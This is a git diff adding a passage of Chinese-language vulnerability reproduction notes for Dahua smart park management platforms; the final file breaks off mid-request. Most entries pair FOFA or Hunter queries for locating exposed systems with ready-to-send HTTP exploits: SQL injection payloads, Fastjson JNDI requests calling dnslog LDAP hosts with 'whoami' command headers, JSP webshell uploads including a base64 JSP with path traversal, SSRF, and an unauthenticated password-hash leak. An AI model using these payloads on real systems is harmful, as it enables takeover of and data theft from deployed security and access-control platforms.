++ hunter：`app.name="Dahua 大华 智慧园区管理平台"`
+
+![1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad.png](./img/B0-EQlrucjZkjtaZ/1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad-456762.png)
+
++ 登录页面：
+
+![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/B0-EQlrucjZkjtaZ/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-634247.png)
+
+# 四、漏洞复现
+```plain
+POST /portal/services/itcBulletin HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: {hostname}
+Content-Length: 442
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:itc="http://itcbulletinservice.webservice.dssc.dahua.com">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <itc:deleteBulletin>
+         <!--type: string-->
+         <netMarkings>(UPDATEXML(2326,
+        CONCAT(0x2e,0x71706a7171,(select 111*111),0x71706a7171),4027)))AND (2373=2373</netMarkings>
+      </itc:deleteBulletin>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1702741800989-1457b1a9-1b82-4fc0-8a06-ca9921345835.png](./img/B0-EQlrucjZkjtaZ/1702741800989-1457b1a9-1b82-4fc0-8a06-ca9921345835-626897.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/in7vnveyi5bug7u3>
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台deleteFtp接口远程命令执行.md b/大华智慧园区综合管理平台deleteFtp接口远程命令执行.md
new file mode 100644
index 0000000..3d1cdad
--- /dev/null
+++ b/大华智慧园区综合管理平台deleteFtp接口远程命令执行.md
@@ -0,0 +1,38 @@
+# 大华智慧园区综合管理平台deleteFtp 接口远程命令执行
+
+# 一、漏洞简介
+大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台，旨在为园区提供一站式解决方案，包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台deleteFtp 接口远程命令执行，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
++ hunter:`app.name="Dahua 大华 智慧园区管理平台"`  
+![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/pOtHG7nJ8gFl98LB/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-790928.png)
++ 登录页面：
+
+![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/pOtHG7nJ8gFl98LB/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-069976.png)
+
+# 四、漏洞复现
+<font style="color:rgb(51, 51, 51);">deleteFtp接口存在命令执行漏洞，可执行LDAP解析等。</font>
+
+```plain
+POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
+Connection: close
+Content-Length: 243
+Content-Type: application/json
+Accept-Encoding: gzip, deflate, br
+
+{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://tcpj5b.dnslog.cn","autoCommit":true}}}
+```
+
+![1701837472770-9787e19a-53f3-4259-a324-e80ff36b084b.png](./img/pOtHG7nJ8gFl98LB/1701837472770-9787e19a-53f3-4259-a324-e80ff36b084b-860944.png)
+
+![1701837487031-7b43ed54-fcc2-4079-9e5a-7d3bce88fb2a.png](./img/pOtHG7nJ8gFl98LB/1701837487031-7b43ed54-fcc2-4079-9e5a-7d3bce88fb2a-784274.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/il26hyyl70fmzm9e>
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞.md b/大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞.md
new file mode 100644
index 0000000..f48df3a
--- /dev/null
+++ b/大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞.md
@@ -0,0 +1,48 @@
+# 大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞
+
+# 一、漏洞描述
+大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台，旨在为园区提供一站式解决方案，包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。 大华智慧园区综合管理平台存在文件上传漏洞，攻击者可以通过devicePoint_addImgIco接口任意上传文件，导致系统被攻击与控制。
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
++ FOFA：`app=”dahua-智慧园区综合管理平台”`
+
+![1689521413401-0fcf65cb-53cc-4666-af1d-1dc09204909c.png](./img/hi1qO8cn6s8WakbW/1689521413401-0fcf65cb-53cc-4666-af1d-1dc09204909c-329370.png)
+
++ 登陆页面：
+
+![1689521436792-cc9eee7b-0158-4165-98e2-cb02571c6b37.png](./img/hi1qO8cn6s8WakbW/1689521436792-cc9eee7b-0158-4165-98e2-cb02571c6b37-667321.png)
+
+# 四、漏洞复现
+构造如下数据包：
+
+```plain
+POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
+Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
+User-Agent: Java/1.8.0_345
+Host: 127.0.0.1:8009
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 223
+Connection: close
+
+--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
+Content-Disposition: form-data; name="upload"; filename="1ndex.jsp"
+Content-Type: application/octet-stream
+Content-Transfer-Encoding: binary
+
+123
+--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
+```
+
+![1689521496391-6cc01c58-3eaf-4f41-979e-cd73555e1a8c.png](./img/hi1qO8cn6s8WakbW/1689521496391-6cc01c58-3eaf-4f41-979e-cd73555e1a8c-471004.png)
+
+上传文件访问地址：`http://127.0.0.1:8314/upload/emap/society_new/ico_res_221b04b177b8_on.jsp`
+
+![1689521515458-6cc6cba2-23aa-48a9-935d-544867a65246.png](./img/hi1qO8cn6s8WakbW/1689521515458-6cc6cba2-23aa-48a9-935d-544867a65246-774167.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hfgy041afmv0g04c>
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台getGroupInfoListByGroupIdSQL注入漏洞.md b/大华智慧园区综合管理平台getGroupInfoListByGroupIdSQL注入漏洞.md
new file mode 100644
index 0000000..f34c061
--- /dev/null
+++ b/大华智慧园区综合管理平台getGroupInfoListByGroupIdSQL注入漏洞.md
@@ -0,0 +1,54 @@
+# 大华智慧园区综合管理平台getGroupInfoListByGroupId SQL注入漏洞
+
+# 一、漏洞简介
+  “大华智慧园区综合管理平台”是一款综合管理平台，具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配，满足多元化的管理需求，同时通过提供智能服务，增强使用体验。大华智慧园区综合管理平台未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息，进一步利用可能获取目标系统权限。
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
++ hunter：`app.name="Dahua 大华 智慧园区管理平台"`
+
+![1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad.png](./img/HyCfpnh12vPSlAOZ/1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad-892669.png)
+
++ 登录页面：
+
+![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/HyCfpnh12vPSlAOZ/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-055362.png)
+
+# 四、漏洞复现
+```plain
+POST /portal/services/clientServer HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: {hostname}
+Content-Length: 509
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <cli:getGroupInfoListByGroupId>
+         <!--type: string-->
+         <arg0>5398) UNION ALL SELECT 5336,5336,5336,5336,CONCAT(0x7178787a71,IFNULL(CAST(111*111 AS NCHAR),0x20),0x7171717871)-- -</arg0>
+         <!--type: long-->
+         <arg1>10</arg1>
+      </cli:getGroupInfoListByGroupId>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1702740228771-97951741-ca39-45d7-9bbe-523aec3c6b2d.png](./img/HyCfpnh12vPSlAOZ/1702740228771-97951741-ca39-45d7-9bbe-523aec3c6b2d-553522.png)
+
+```plain
+qxxzq12321qqqxq
+```
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mwwzf1bqn91wm5nk>
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞.md b/大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞.md
new file mode 100644
index 0000000..c799b80
--- /dev/null
+++ b/大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞.md
@@ -0,0 +1,33 @@
+# 大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞
+
+大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞，未经授权的攻击者可以上传恶意Webshell的JSP文件，可以进行RCE利用。
+
+## fofa
+
+```javascript
+app="dahua-智慧园区综合管理平台"
+```
+
+## poc
+
+```javascript
+POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
+Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
+User-Agent: Java/1.8.0_345
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 229
+Connection: close
+
+--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
+Content-Disposition: form-data; name="upload"; filename="1.jsp"
+Content-Type: application/octet-stream
+Content-Transfer-Encoding: binary
+
+123456
+--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
+```
+
+![image-20241008142600054](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410081426265.png)
+
+文件路径 `http://ip:port/upload/emap/society_new/`+文件名
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台image存在ssrf漏洞.md b/大华智慧园区综合管理平台image存在ssrf漏洞.md
new file mode 100644
index 0000000..320a9c5
--- /dev/null
+++ b/大华智慧园区综合管理平台image存在ssrf漏洞.md
@@ -0,0 +1,35 @@
+# 大华智慧园区综合管理平台image存在ssrf漏洞
+
+# 一、漏洞简介
+大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台，旨在为园区提供一站式解决方案，包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台image存在ssrf漏洞。
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
++ hunter:`app.name="Dahua 大华 智慧园区管理平台"`  
+![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/DOxfwLpWEXM6MdBG/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-825024.png)
++ 登录页面：
+
+![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/DOxfwLpWEXM6MdBG/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-393106.png)
+
+# 四、漏洞复现
+```plain
+GET /ipms/imageConvert/image?fileUrl=http://6nqhen.dnslog.cn/1.jpg HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1703413934936-57322599-bfc5-4c8b-856f-2df6401f202c.png](./img/DOxfwLpWEXM6MdBG/1703413934936-57322599-bfc5-4c8b-856f-2df6401f202c-638099.png)
+
+![1703413952204-847b65eb-ac46-4b8d-b721-9e03d9555c50.png](./img/DOxfwLpWEXM6MdBG/1703413952204-847b65eb-ac46-4b8d-b721-9e03d9555c50-451554.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lz57tt4k7pi5gqem>
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台pay远程命令执行.md b/大华智慧园区综合管理平台pay远程命令执行.md
new file mode 100644
index 0000000..2e65325
--- /dev/null
+++ b/大华智慧园区综合管理平台pay远程命令执行.md
@@ -0,0 +1,35 @@
+# 大华智慧园区综合管理平台pay 远程命令执行
+
+# 一、漏洞简介
+大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台，旨在为园区提供一站式解决方案，包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台pay远程命令执行，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
++ hunter:`app.name="Dahua 大华 智慧园区管理平台"`  
+![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/wn8K3RjMTMfb0sEx/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-175675.png)
++ 登录页面：
+
+![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/wn8K3RjMTMfb0sEx/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-210923.png)
+
+# 四、漏洞复现
+```plain
+POST /ipms/barpay/pay HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: close
+Content-Length: 127
+Accept-Encoding: gzip, deflate
+Cmd: whoami
+Content-Type: application/json
+
+{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://uh8aga.dnslog.cn", "autoCommit": true}
+```
+
+![1703413736105-efd77f3a-f2c3-430a-be05-31c15cd54cb7.png](./img/wn8K3RjMTMfb0sEx/1703413736105-efd77f3a-f2c3-430a-be05-31c15cd54cb7-325893.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dxg184gk73n2gyt8>
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台poi任意文件上传漏洞.md b/大华智慧园区综合管理平台poi任意文件上传漏洞.md
new file mode 100644
index 0000000..649ef2d
--- /dev/null
+++ b/大华智慧园区综合管理平台poi任意文件上传漏洞.md
@@ -0,0 +1,62 @@
+# 大华智慧园区综合管理平台poi任意文件上传漏洞
+
+# 一、漏洞描述
+大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台，旨在为园区提供一站式解决方案，包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。 <font style="color:rgba(0, 0, 0, 0.9);">大华智慧园区综合管理平台在/emap/webservice/gis/soap/poi接口处存在任意文件上传漏洞，可以利用此漏洞获得webshell。</font>
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
++ hunter:`app.name="Dahua 大华 智慧园区管理平台"`  
+![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/YD6R9DCWkCac1mzy/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-882487.png)
++ 登录页面：
+
+![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/YD6R9DCWkCac1mzy/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-782181.png)
+
+# 四、漏洞复现
+```plain
+POST /emap/webservice/gis/soap/poi HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: JSESSIONID=9EC0A731FFF852957C17C91FE2EF24BD
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 683
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+xmlns:res="http://response.webservice.poi.mapbiz.emap.dahuatech.com/">
+<soapenv:Header/>
+<soapenv:Body>
+<res:uploadPicFile>
+<!--type:string-->
+<arg0>/../../1.jsp</arg0>
+<!--type:base64Binary-->
+<arg1>PCVAcGFnZSBpbXBvcnQ9ImphdmEudGV4dC4qLGphdmEudXRpbC4qLGphdmEuaW8uKiIlPgo8JQpTaW1wbGVEYXRlRm9ybWF0IGRmID0gbmV3IFNpbXBsZURhdGVGb3JtYXQoInl5eS1NTS1kZCBISDptbTpzcyIpOwpvdXQucHJpbnRsbihkZi5mb3JtYXQobmV3IERhdGUoKSkpOwpGaWxlIGZpbGUgPSBuZXcgRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKTsKZmlsZS5kZWxldGUoKTsKJT4=</arg1>
+</res:uploadPicFile>
+</soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1694071791341-5248d78f-4c1e-4dd3-8b9e-29c6fd09aabe.png](./img/YD6R9DCWkCac1mzy/1694071791341-5248d78f-4c1e-4dd3-8b9e-29c6fd09aabe-418276.png)
+
+上传文件位置
+
+```plain
+http://xx.xx.xx.xx/upload/1.jsp
+```
+
+![1694071840120-b98410d5-a689-4743-8a5b-e59ad7b99583.png](./img/YD6R9DCWkCac1mzy/1694071840120-b98410d5-a689-4743-8a5b-e59ad7b99583-299337.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bdf3yqzbh9p9h9ev>
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台searchJsonSQL注入漏洞.md b/大华智慧园区综合管理平台searchJsonSQL注入漏洞.md
new file mode 100644
index 0000000..c091c58
--- /dev/null
+++ b/大华智慧园区综合管理平台searchJsonSQL注入漏洞.md
@@ -0,0 +1,41 @@
+# 大华智慧园区综合管理平台searchJson SQL注入漏洞
+
+# 一、漏洞简介
+  “大华智慧园区综合管理平台”是一款综合管理平台，具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配，满足多元化的管理需求，同时通过提供智能服务，增强使用体验。大华智慧园区综合管理平台未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息，进一步利用可能获取目标系统权限。
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
++ hunter：`app.name="Dahua 大华 智慧园区管理平台"`
+
+![1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad.png](./img/9KTgHf02N5fP6w1g/1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad-737633.png)
+
++ 登录页面：
+
+![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/9KTgHf02N5fP6w1g/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-887240.png)
+
+# 四、漏洞复现
+```plain
+GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: JSESSIONID=0B95DCE16676556E16169127452F23E1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1694074042507-ea2e434a-5839-4d4f-9c5f-c93c890625f7.png](./img/9KTgHf02N5fP6w1g/1694074042507-ea2e434a-5839-4d4f-9c5f-c93c890625f7-635909.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nuyho759ar0isski>
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台sendFaceInfo远程命令执行.md b/大华智慧园区综合管理平台sendFaceInfo远程命令执行.md
new file mode 100644
index 0000000..a63300c
--- /dev/null
+++ b/大华智慧园区综合管理平台sendFaceInfo远程命令执行.md
@@ -0,0 +1,36 @@
+# 大华智慧园区综合管理平台sendFaceInfo 远程命令执行
+
+大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台，旨在为园区提供一站式解决方案，包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台sendFaceInfo远程命令执行，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
++ hunter:`app.name="Dahua 大华 智慧园区管理平台"`  
+![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/gH4aRxv7rmMOuKxg/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-893238.png)
++ 登录页面：
+
+![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/gH4aRxv7rmMOuKxg/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-993966.png)
+
+# 四、漏洞复现
+```plain
+POST /CardSolution/card/face/sendFaceInfo HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+Content-Length: 216
+Accept-Encoding: gzip
+Connection: close
+Content-Type: application/json
+Testcmd: whoami
+
+{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://qq6t3h.dnslog.cn","autoCommit":true}}}
+```
+
+![1707099788399-a0b536ac-88d2-493d-a289-b56a16136cbc.png](./img/gH4aRxv7rmMOuKxg/1707099788399-a0b536ac-88d2-493d-a289-b56a16136cbc-500956.png)
+
+![1707099808913-cbbd7047-d6c8-459b-8ce5-66e093aa3b3d.png](./img/gH4aRxv7rmMOuKxg/1707099808913-cbbd7047-d6c8-459b-8ce5-66e093aa3b3d-109428.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ggwqu2ux26v8ogez>
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台video任意文件上传漏洞.md b/大华智慧园区综合管理平台video任意文件上传漏洞.md
new file mode 100644
index 0000000..5634b20
--- /dev/null
+++ b/大华智慧园区综合管理平台video任意文件上传漏洞.md
@@ -0,0 +1,55 @@
+# 大华智慧园区综合管理平台video任意文件上传漏洞
+
+# 一、漏洞描述
+大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台，旨在为园区提供一站式解决方案，包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。 大华智慧园区综合管理平台存在文件上传漏洞，攻击者可以通过请求publishing/publishing/material/file/video接口任意上传文件，导致系统被攻击与控制。
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
++ hunter:`app.name="Dahua 大华 智慧园区管理平台"`  
+![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/WIhLPHsxR0MtfBnz/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-368760.png)
++ 登录页面：
+
+![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/WIhLPHsxR0MtfBnz/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-078258.png)
+
+# 四、漏洞复现
+```plain
+POST /publishing/publishing/material/file/video HTTP/1.1
+Content-Type: multipart/form-data; boundary=00content0boundary00
+User-Agent: Java/1.8.0_381
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Length: 287
+
+--00content0boundary00
+Content-Disposition: form-data; name="Filedata"; filename="1ndex.jsp"
+
+test
+--00content0boundary00
+Content-Disposition: form-data; name="file"
+
+file
+--00content0boundary00
+Content-Disposition: form-data; name="Submit"
+
+submit
+--00content0boundary00--
+
+```
+
+![1691828397306-98208fcc-6c2f-47b1-9ef5-00ef5a6fa4bf.png](./img/WIhLPHsxR0MtfBnz/1691828397306-98208fcc-6c2f-47b1-9ef5-00ef5a6fa4bf-304986.png)
+
+上传文件位置：
+
+```plain
+/publishingImg/VIDEO/230812162057144051.jsp
+```
+
+![1691828467294-b2ffd5e1-6752-43e1-af2c-0c5ace27137c.png](./img/WIhLPHsxR0MtfBnz/1691828467294-b2ffd5e1-6752-43e1-af2c-0c5ace27137c-599009.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lggztymnkglaq1p9>
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台密码泄露漏洞.md b/大华智慧园区综合管理平台密码泄露漏洞.md
new file mode 100644
index 0000000..7cf8f4b
--- /dev/null
+++ b/大华智慧园区综合管理平台密码泄露漏洞.md
@@ -0,0 +1,28 @@
+# 大华智慧园区综合管理平台密码泄露漏洞
+
+# 一、漏洞简介
+大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台，旨在为园区提供一站式解决方案，包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。由于敏感目录并未进行鉴权，所以可以直接得到system的密码（采用MD5加密）。
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
++ hunter:`app.name="Dahua 大华 智慧园区管理平台"`  
+![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/j5J4UTsXNi3QyccW/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-147085.png)
++ 登录页面：
+
+![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/j5J4UTsXNi3QyccW/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-860009.png)
+
+# 四、漏洞复现
+```plain
+/admin/user_getUserInfoByUserName.action?userName=system
+```
+
+![1691939932039-c2486925-3f44-4e78-a2c5-49b640dad81d.png](./img/j5J4UTsXNi3QyccW/1691939932039-c2486925-3f44-4e78-a2c5-49b640dad81d-064672.png)
+
+可通过遍历`userName`参数，获取md5加密的密码，
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qkdoiry1tgrhdk63>
\ No newline at end of file
diff --git a/大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747).md b/大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747).md
new file mode 100644
index 0000000..e3d1372
--- /dev/null
+++ b/大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747).md
@@ -0,0 +1,26 @@
+# 大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747)
+
+大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747)，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+title="智能云网关注册管理平台"
+```
+
+## poc
+
+```javascript
+POST /index.php/User/doLogin HTTP/1.1
+Host: 
+Accept: */*
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
+X-Requested-With: XMLHttpRequest
